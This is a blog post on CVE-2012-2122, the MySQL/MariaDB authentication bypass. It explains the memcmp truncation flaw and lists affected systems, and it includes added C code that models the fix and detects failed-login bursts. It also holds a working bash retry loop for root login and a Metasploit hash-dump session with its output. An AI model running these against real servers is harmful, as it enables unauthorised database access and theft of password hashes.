
Sunday, 1 September 2013

CVE-2012-2122: Exploiting authentication bypass vulnerability in MySQL and MariaDB

The news about the vulnerability in MySQL and MariaDB spread like wildfire; I covered it as a news article on E Hacking News. Here I am going to share the same thing from the perspective of a penetration tester.

MySQL and MariaDB versions 5.1.61, 5.2.11, 5.3.5 and 5.5.22 are the affected versions.

The vulnerability allows an attacker to access a MySQL database without supplying valid authentication credentials. It can only be exploited if MySQL was built on a system where the memcmp() function can return values outside the -128 to 127 range: the password check returned the raw memcmp() result through a my_bool (a plain char), so a nonzero result such as 256 is truncated to 0 and read by the caller as "password matches".

According to Golubchik, the gcc built-in memcmp and the BSD libc memcmp are safe, but the Linux glibc SSE-optimised memcmp is not.

Not all Linux distros are affected; only the following systems are vulnerable:
* Ubuntu Linux 64-bit (10.04, 11.10, 11.04, 12.04)
* openSUSE 12.1 64-bit, MySQL 5.5.23-log
* Debian Unstable 64-bit, 5.5.23.2
* Fedora
* Arch Linux

To test for the vulnerability, run the following bash one-liner (it retries the login up to 1000 times, discarding the "Access denied" errors):
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

Against an affected MySQL server, the above loop will provide access as the root user account.
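The paragraphs above describe the root cause (a memcmp() result narrowed to a char) and the test loop that relies on it. The following C program is an added example written for this post, not MySQL's own source: it models the vulnerable and fixed shapes of the check_scramble() return statement, uses a constructed wide_memcmp() that stands in for any libc memcmp whose result is not confined to -128..127, and computes how likely the 1000-iteration loop is to hit the flaw under the roughly 1-in-256 per-attempt rate given in the public disclosure (that rate is not stated in this post). All names and sample scrambles are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Added example for CVE-2012-2122; this is a model, not MySQL's source code.
 * The vulnerable check_scramble() returned the raw memcmp() result through
 * MySQL's my_bool, which is a plain char. Any nonzero result that is a
 * multiple of 256 narrows to 0, and 0 means "the scrambles match". The
 * upstream fix returns test(memcmp(...)), i.e. (memcmp(...) != 0), so the
 * value is normalised to 0 or 1 before it is narrowed. */

typedef char my_bool;
#define SCRAMBLE_LENGTH 20

/* Vulnerable shape: the int from memcmp() is narrowed to my_bool. */
static my_bool vulnerable_mismatch(int memcmp_result) {
    return (my_bool)memcmp_result;       /* 256 -> 0: reads as a match */
}

/* Fixed shape: normalise to 0/1 before narrowing. */
static my_bool fixed_mismatch(int memcmp_result) {
    return memcmp_result != 0;
}

/* How many nonzero memcmp() results in [-limit, limit] does `check`
 * wrongly report as a match? A correct checker returns 0. */
static int count_false_matches(my_bool (*check)(int), int limit) {
    int false_matches = 0;
    for (int r = -limit; r <= limit; r++)
        if (r != 0 && check(r) == 0) false_matches++;
    return false_matches;
}

/* Constructed stand-in for an optimised memcmp(): compares 16-bit big-endian
 * units and returns their arithmetic difference. It plays the role of any
 * libc memcmp whose result is not confined to -128..127. */
static int wide_memcmp(const unsigned char *a, const unsigned char *b, size_t n) {
    for (size_t i = 0; i + 1 < n; i += 2) {
        int wa = (a[i] << 8) | a[i + 1];
        int wb = (b[i] << 8) | b[i + 1];
        if (wa != wb) return wa - wb;
    }
    return 0;
}

/* Constructed 20-byte scrambles differing only in the first byte, so
 * wide_memcmp() returns 0xACAB - 0xABAB = 0x0100 = 256 for them. */
static const unsigned char SCRAMBLE_EXPECTED[SCRAMBLE_LENGTH] = {
    0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,
    0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB };
static const unsigned char SCRAMBLE_GOT[SCRAMBLE_LENGTH] = {
    0xAC,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,
    0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB,0xAB };

/* Shapes of the vulnerable and fixed check_scramble() return statements.
 * Nonzero means "mismatch"; 0 means "match". */
static my_bool check_scramble_vulnerable(const unsigned char *got, const unsigned char *expected) {
    return wide_memcmp(got, expected, SCRAMBLE_LENGTH);        /* narrowed on return */
}
static my_bool check_scramble_fixed(const unsigned char *got, const unsigned char *expected) {
    return wide_memcmp(got, expected, SCRAMBLE_LENGTH) != 0;
}

/* Chance that at least one of `attempts` logins is wrongly accepted, assuming
 * (per the public disclosure, not this post) about 1 in 256 per attempt. This
 * is why a loop of 1000 tries is ample, and why a defender sees a burst of a
 * few hundred failed logins before the one that succeeds. */
static double bypass_probability(int attempts) {
    double none = 1.0;
    for (int i = 0; i < attempts; i++) none *= 255.0 / 256.0;
    return 1.0 - none;
}

int main(void) {
    printf("false matches, vulnerable checker: %d\n", count_false_matches(vulnerable_mismatch, 1024));
    printf("false matches, fixed checker:      %d\n", count_false_matches(fixed_mismatch, 1024));
    printf("mismatched scramble: vulnerable reports mismatch=%d, fixed reports mismatch=%d\n",
           check_scramble_vulnerable(SCRAMBLE_GOT, SCRAMBLE_EXPECTED),
           check_scramble_fixed(SCRAMBLE_GOT, SCRAMBLE_EXPECTED));
    printf("P(bypass within 1000 attempts) = %.3f\n", bypass_probability(1000));
    return 0;
}
```

The vulnerable checker accepts every memcmp() result that is a multiple of 256 (eight of them in the range -1024..1024), and for the constructed scramble pair it reports a match although the first bytes differ; the fixed checker, which normalises the result before it is narrowed, rejects all of them.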

The following video was provided by an EHN reader:


Exploiting using Metasploit:
A Metasploit contributor committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database.
A quick demonstration of this module is shown below, using the latest Metasploit Framework GIT/SVN snapshot:

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
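Both the bash loop and the Metasploit module above succeed only after a burst of failed logins (205 attempts in the session shown), and that burst is what a defender can see. The program below is an added detection example written for this post, not part of the original article or of Metasploit: it scans MySQL 5.5-style error-log lines (the "Access denied" warnings the server writes when log_warnings is set above 1) and flags any source host that produced at least a threshold number of denied logins within a sliding window. The log lines, hosts and thresholds are constructed sample data.

```c
#include <stdio.h>
#include <string.h>

/* Added detection example, not part of the original post. It scans
 * MySQL 5.5-style error-log lines for the burst of "Access denied"
 * warnings that a CVE-2012-2122 bypass loop produces: many failed logins
 * for one account from one host within seconds. Sample lines are constructed. */

#define MAX_EVENTS 64
#define MAX_HOST   64

static const char *const SAMPLE_LOG[] = {
    "130901 12:00:00 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)",
    "130901 12:00:01 [Warning] Access denied for user 'root'@'127.0.0.1' (using password: YES)",
    "130901 12:00:01 [Warning] Access denied for user 'root'@'127.0.0.1' (using password: YES)",
    "130901 12:00:02 [Warning] Access denied for user 'root'@'127.0.0.1' (using password: YES)",
    "130901 12:00:02 [Note] Event Scheduler: Loaded 0 events",
    "130901 12:00:02 [Warning] Access denied for user 'root'@'127.0.0.1' (using password: YES)",
    "130901 12:00:03 [Warning] Access denied for user 'root'@'127.0.0.1' (using password: YES)",
    "130901 12:00:03 [Warning] Access denied for user 'root'@'127.0.0.1' (using password: YES)",
    "130901 12:05:00 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)",
};
#define SAMPLE_LOG_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

/* Parse one error-log line. Returns 1 and fills *secs (time of day in
 * seconds) and host (the source address) if it is an "Access denied"
 * warning, 0 for any other line. */
static int parse_denied(const char *line, int *secs, char *host, size_t hostsz) {
    int h, m, s;
    if (sscanf(line, "%*6s %d:%d:%d", &h, &m, &s) != 3) return 0;
    if (!strstr(line, "Access denied for user")) return 0;
    const char *p = strstr(line, "'@'");
    if (!p) return 0;
    p += 3;
    const char *end = strchr(p, '\'');
    if (!end || (size_t)(end - p) >= hostsz) return 0;
    memcpy(host, p, (size_t)(end - p));
    host[end - p] = '\0';
    *secs = h * 3600 + m * 60 + s;
    return 1;
}

/* Flag every host with at least `threshold` denied logins inside any
 * `window`-second span. Returns the number of flagged hosts and copies the
 * first one into `first` (if non-NULL). Lines are assumed to be in time order. */
static int flag_bursts(const char *const *lines, size_t n, int window, int threshold,
                       char *first, size_t firstsz) {
    int secs[MAX_EVENTS];
    char hosts[MAX_EVENTS][MAX_HOST];
    char flagged[MAX_EVENTS][MAX_HOST];
    size_t count = 0;
    int nflagged = 0;

    for (size_t i = 0; i < n && count < MAX_EVENTS; i++)
        if (parse_denied(lines[i], &secs[count], hosts[count], MAX_HOST)) count++;

    for (size_t i = 0; i < count; i++) {
        int in_window = 0;
        for (size_t j = 0; j < count; j++)
            if (strcmp(hosts[i], hosts[j]) == 0 && secs[j] <= secs[i] && secs[i] - secs[j] < window)
                in_window++;
        if (in_window < threshold) continue;
        int seen = 0;
        for (int k = 0; k < nflagged; k++)
            if (strcmp(flagged[k], hosts[i]) == 0) seen = 1;
        if (seen) continue;
        strcpy(flagged[nflagged++], hosts[i]);
        if (nflagged == 1 && first && firstsz > 0) {
            strncpy(first, hosts[i], firstsz - 1);
            first[firstsz - 1] = '\0';
        }
    }
    return nflagged;
}

/* Convenience wrappers over the constructed sample log. */
static int sample_flagged_count(int window, int threshold) {
    return flag_bursts(SAMPLE_LOG, SAMPLE_LOG_LEN, window, threshold, NULL, 0);
}
static const char *sample_first_flagged(int window, int threshold) {
    static char host[MAX_HOST];
    host[0] = '\0';
    flag_bursts(SAMPLE_LOG, SAMPLE_LOG_LEN, window, threshold, host, sizeof host);
    return host;
}

int main(void) {
    int n = sample_flagged_count(60, 5);
    printf("%d host(s) flagged", n);
    if (n > 0) printf(", first: %s", sample_first_flagged(60, 5));
    printf("\n");
    return 0;
}
```

With a 60-second window and a threshold of 5, the six denied logins from 127.0.0.1 within three seconds are flagged, while the two from 10.0.0.5 five minutes apart are not. A real deployment would feed the live error log (or the general query log's connect records) through the same per-host windowing and, for this flaw, also treat a successful login that directly follows such a burst as the alert condition.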


Credit Zoombie Hacker

